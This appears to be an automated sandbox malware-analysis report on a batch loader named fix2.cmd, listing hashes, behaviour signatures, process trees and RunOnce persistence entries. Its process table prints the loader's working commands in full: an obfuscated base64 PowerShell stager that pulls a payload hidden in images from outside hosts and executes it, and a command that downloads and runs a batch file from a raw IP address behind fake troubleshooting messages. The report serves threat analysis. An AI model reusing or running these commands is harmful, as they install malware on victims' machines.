File name:

fix2.cmd

Full analysis: https://app.any.run/tasks/b7fda0f0-cd80-40dc-9ad7-ed11fb5bc499
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: September 03, 2025, 16:10:34
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
reverseloader
ta558
apt
payload
stegocampaign
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

161BECAD962E2351D74D9921EDE038FC

SHA1:

7726CCD45126A9F0BE73CA5EEB33254A66161B3E

SHA256:

8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88

SSDEEP:

24:0sTDggIOggIOt6WB3wQC5glm3wQ9F5gl4enGSb9+G5BavFkhtyPR7zErrCBVYJOz:JD8LjWB9Calm9Xal4qGSp1kKHyPRvh7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 2028)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

  • SUSPICIOUS

    • Starts process via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6812)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)

    • Found IP address in command line

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 1604)
      • powershell.exe (PID: 6664)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 6836)
      • cmd.exe (PID: 6356)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 3620)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)

    • Application launched itself

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 3620)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 2028)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 6356)

    • Removes files via Powershell

      • powershell.exe (PID: 3396)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)

    • Checks proxy server information

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
      • slui.exe (PID: 1324)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Creates files in the program directory

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)

    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • conhost.exe (PID: 7008)
      • conhost.exe (PID: 4012)
      • powershell.exe (PID: 6808)
      • conhost.exe (PID: 1324)
      • powershell.exe (PID: 5368)
      • conhost.exe (PID: 2432)
      • conhost.exe (PID: 1508)
      • conhost.exe (PID: 5876)
      • powershell.exe (PID: 4312)
      • conhost.exe (PID: 1488)
      • conhost.exe (PID: 5548)
      • conhost.exe (PID: 7060)
      • powershell.exe (PID: 2028)
      • conhost.exe (PID: 1644)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 3836)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)

    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)

    • Manual execution by a user

      • cmd.exe (PID: 6356)

    • Reads the software policy settings

      • slui.exe (PID: 1324)

    • Returns all items recursively from all subfolders (POWERSHELL)

      • powershell.exe (PID: 3396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
191
Monitored processes
58
Malicious processes
18
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe timeout.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs conhost.exe no specs slui.exe powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
304timeout /t 5 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
504powershell -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhAG0AIAAoAFsAd@wB0AHIAaQBuAGd@AWwBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEd@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4AIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACAAIAAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQAZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBpAC4AaQBiAGIALgBjAG8ALwA3AGQAYgBHAEsAdwBYAFoALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkALAAgACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBiAGkAdABiAHUAYwBrAGUAdAAuAG8Ad@gBnAC8AaABnAGYAZABmAHMAZgAvAGoAawByADQALwByAGEAdwAvADYAZABkAGUAMAAwADAAMAA4ADkAMAA1ADgAMwAyADAANQA5AGIAYQAzAGQAOAA2AGYAOQBhAGIAOQAzADIANwA3ADEAMwBhADQAZAA5ADUALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAd@gBvAG0ATABpAG4AawBzACAAJABsAGkAbgBrAHMAOwAKACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGd@AZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAd@gBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAd@wApADsACgAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACd@APAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGd@AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAd@wB0AGEAd@gB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsACgAgACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAKQA7AAoAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAd@gB0AF0AOgA6AEYAd@gBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGd@AKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAd@wBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AAoAIAAgACAAIAAgACAAIAAgADEALgAuADIAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAFMAdABhAHIAdAAtAFMAbABlAGUAd@AAgADEAIAB9ACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkALgBHAGUAdABUAHkAd@ABlACgAJwB0AGUAd@wB0AHAAbwB3AGUAd@gBzAGgAZQBsAGwALgBIAG8AYQBhAGEAYQBhAGEAd@wBkAG0AZQAnACkAOwAKACAAIAAgACAAIAAgACAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB0AGEAd@gB0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAZQBjACAAPQAgACd@AUgBlAGd@AQQBzAG0AJwA7AAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAd@ABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAGwAZgBzAGd@AZQBkAGQAZABkAGQAZABkAGEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACd@AdAB4AHQALgA4ADUAMgA3AF8AOAA4ADQANgA4ADQANgA1ADd@AMQBfAGQAYQBvAGwAeQBhAHAALwBuAGkAYQBtAC8AdwBhAHIALwB0AG8AbABwAGUAd@gAvAHQAeQB0AGkAdQBpAGIAbgAvAGd@Ad@gBvAC4AdABlAGsAYwB1AGIAdABpAGIALwAvADoAd@wAnACwAIAAnADEAJwAsACAAJwBXAGkAbgBkAG8AdwBzAFUAd@ABkAGEAdABlACd@ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgAOAA2ACd@AKQApAH0AfQA7AAoA'';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($sofigo.replace(''d@'',''c'')));iex $OWjuxD\"'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1100powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1180powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1244C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\WindowsUpdate1.bat" "C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1324\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1324C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1336powershell -Command "Invoke-WebRequest -Uri 'http://206.82.9.203/WindowsUpdate.bat' -OutFile 'C:\Users\admin\WindowsUpdate1.bat' -UseBasicParsing; Start-Process -FilePath 'C:\Users\admin\WindowsUpdate1.bat' -Wait"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1488\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
131 009
Read events
131 005
Write events
4
Delete events
0

Modification events

(PID) Process:(6664) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:eFfcofbcfd
Value:
C:\ProgramData\WindowsUpdate.bat
(PID) Process:(6836) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:FFliFmAeAo
Value:
C:\ProgramData\SystemService.bat
(PID) Process:(5968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:cAieSjmhdi
Value:
C:\ProgramData\WindowsUpdate.bat
(PID) Process:(3620) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:koAmokFfij
Value:
C:\ProgramData\SystemService.bat
Executable files
0
Suspicious files
1
Text files
59
Unknown types
0

Dropped files

PID
Process
Filename
Type
3620powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lmosqsuy.wpm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4112powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1yekkyha.25v.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4qe3p3g.exo.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4112powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:E6BFEDC9FF851D91F72A51053EE53924
SHA256:622F0668A0BAC428E3CDAC77716EC7E1260B7BAFD3A35BA71BD449B70F50FF8A
4832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3hozw5za.ik5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3620powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hbf0ajvv.yc5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4768powershell.exeC:\ProgramData\WindowsUpdate.battext
MD5:161BECAD962E2351D74D9921EDE038FC
SHA256:8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
1936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zowu11nk.fwl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qwbuqxo4.lhn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
